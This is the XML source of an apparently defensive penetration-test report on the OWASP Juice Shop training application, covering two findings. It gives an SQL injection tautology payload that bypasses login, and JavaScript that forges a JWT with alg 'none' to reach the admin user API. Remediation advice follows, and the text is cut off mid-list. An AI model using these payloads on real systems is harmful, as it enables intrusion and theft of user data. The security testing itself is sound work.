          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Finding Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS v4 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL Injection Authentication Bypass in Login Form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JWT Algorithm</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">‘none’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Acceptance - Authentication Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="28" w:name="findings-and-remediation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Findings and Remediation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="24" w:name="finding"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="23" w:name="X9b5b8bc2271f382a96005da2a12b1c5f9c45e8b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL Injection Authentication Bypass in Login Form</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9.8</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:hyperlink r:id="rId22">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">POST /rest/user/login, GET /#/login</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login form at /#/login is vulnerable to SQL injection attacks. An attacker can bypass authentication by injecting SQL code into the email field. The application constructs SQL queries by directly concatenating user input without proper parameterization, allowing malicious SQL to alter the query logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerability exists in the authentication endpoint where user-supplied email and password values are embedded directly into SQL queries. By injecting a tautology-based payload, an attacker can manipulate the WHERE clause to always evaluate to true, effectively bypassing authentication checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Navigate to the login page at http://localhost:3333/#/login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘Email’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">field, enter the payload: ’ OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘Password’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">field, enter any value (e.g.,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘anything’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘Log in’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">button</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observe successful authentication as admin@juice-sh.op without valid credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The payload ’ OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– modifies the SQL query structure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Original query likely resembles: SELECT * FROM Users WHERE email =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘USER_INPUT’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">AND password =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘HASH’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Injected query becomes: SELECT * FROM Users WHERE email = ’’ OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">–’ AND password =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘HASH’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">condition always evaluates to true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- The – comments out the remainder of the query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Result: First user record (admin@juice-sh.op) is returned, granting unauthorized access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use parameterized queries (prepared statements) for all database operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement input validation and sanitization on all user-supplied data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply the principle of least privilege to database accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use an ORM that automatically handles parameterization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement Web Application Firewall (WAF) rules to detect and block SQL injection patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conduct regular security code reviews focusing on database interaction points</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="27" w:name="finding-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="26" w:name="X2aa958a13cb1c6253855f1a8f170ec5c08966c1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT Algorithm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Acceptance - Authentication Bypass</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9.3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:hyperlink r:id="rId25">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">http://localhost:3333, GET /api/Users/, GET /rest/user/whoami, GET /#/administration</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JWT implementation in OWASP Juice Shop accepts tokens with algorithm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, allowing complete authentication bypass. The application uses RS256 for JWT signing but fails to properly validate the algorithm header. By changing the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘alg’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">header to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and removing the signature, an attacker can forge arbitrary JWT tokens with any payload, including admin privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key Findings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Original Token Algorithm: RS256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Vulnerable Algorithm Accepted:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Token Storage: localStorage (vulnerable to XSS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Affected Endpoints: /api/Users/, /rest/user/whoami, /#/administration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Complete authentication bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Unauthorized access to admin-only endpoints</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Full user enumeration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Access to sensitive customer data and feedback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Capture original JWT from localStorage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MSwiZW1haWwiOiJhZG1pbkBqdWljZS1zaC5vcCIsInJvbGUiOiJhZG1pbiJ9LCJpYXQiOjE3NzE3MjM3MzZ9.kz6-dNgt6vVb25Df3VLHfKOJtz6LMIJ2Oshd3pCMPy...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Forge token with alg:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> noneHeader </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">typ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'JWT'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">alg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'none'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> forgedPayload </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'admin@juice-sh.op'</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">iat</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> forgedToken </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">btoa</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(noneHeader))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btoa</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(forgedPayload)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'.'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Access admin-only API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/api/Users/'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forgedToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Returns: All 41 users with full details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTP 200 with complete user list including email, role, and profile data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Explicitly Reject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Algorithm:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Configure JWT library to explicitly reject tokens with alg:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
